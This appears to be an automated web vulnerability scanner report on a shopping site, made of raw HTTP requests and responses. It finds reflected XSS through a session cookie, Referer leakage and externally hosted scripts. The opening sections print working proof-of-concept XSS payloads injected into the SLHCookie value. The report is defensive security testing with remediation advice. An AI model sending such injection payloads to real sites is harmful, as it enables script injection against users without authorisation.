GET /water.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0e0b1f'-alert(1)-'6a609e5afd5; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:45 GMT Connection: close Content-Length: 161612
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 996ba'-alert(1)-'f94f11e5ce6 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wine-spirits.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0996ba'-alert(1)-'f94f11e5ce6; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:53:57 GMT Connection: close Content-Length: 167881
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the SLHCookie cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b828'-alert(1)-'d477f1611a0 was submitted in the SLHCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wipes.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=08b828'-alert(1)-'d477f1611a0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:08 GMT Connection: close Content-Length: 164533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /BrowseLocalL2.aspx?n=14391278 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:50:27 GMT Connection: close Content-Length: 167973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /browselocall1.aspx?N=133251 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:48:13 GMT Connection: close Content-Length: 123202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /browselocall1.aspx?N=133251&more=533642 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:54 GMT Connection: close Content-Length: 123310
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /sales.aspx?&clickarea=thumbnail_allweeklyads HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:55 GMT Connection: close Content-Length: 34703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:50 GMT Connection: close Content-Length: 59975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /BrowseLocalL2.aspx?n=14391278 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:50:27 GMT Connection: close Content-Length: 167973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /air-fresheners.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:48 GMT Connection: close Content-Length: 175274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /baby-food.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:02 GMT Connection: close Content-Length: 160152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /baked-goods.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:16 GMT Connection: close Content-Length: 160864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /baking-oils-spices.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:42 GMT Connection: close Content-Length: 177545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /beer-wine-tobacco.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:14 GMT Connection: close Content-Length: 171137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /beer.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:43 GMT Connection: close Content-Length: 161034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /beverages.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:50:09 GMT Connection: close Content-Length: 175713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /black-friday.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:33 GMT Connection: close Content-Length: 39724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /bread.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:19 GMT Connection: close Content-Length: 123538
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /breakfast-bars-pop-tarts.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:27 GMT Connection: close Content-Length: 152353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /breakfast-cereal.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:14 GMT Connection: close Content-Length: 169389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /browselocall1.aspx?N=133251&more=533642 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:54 GMT Connection: close Content-Length: 123310
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /browseonlineall.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=N; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:23 GMT Connection: close Content-Length: 132620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /buns-rolls.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:30 GMT Connection: close Content-Length: 99227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /butter-margarine.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:26 GMT Connection: close Content-Length: 118878
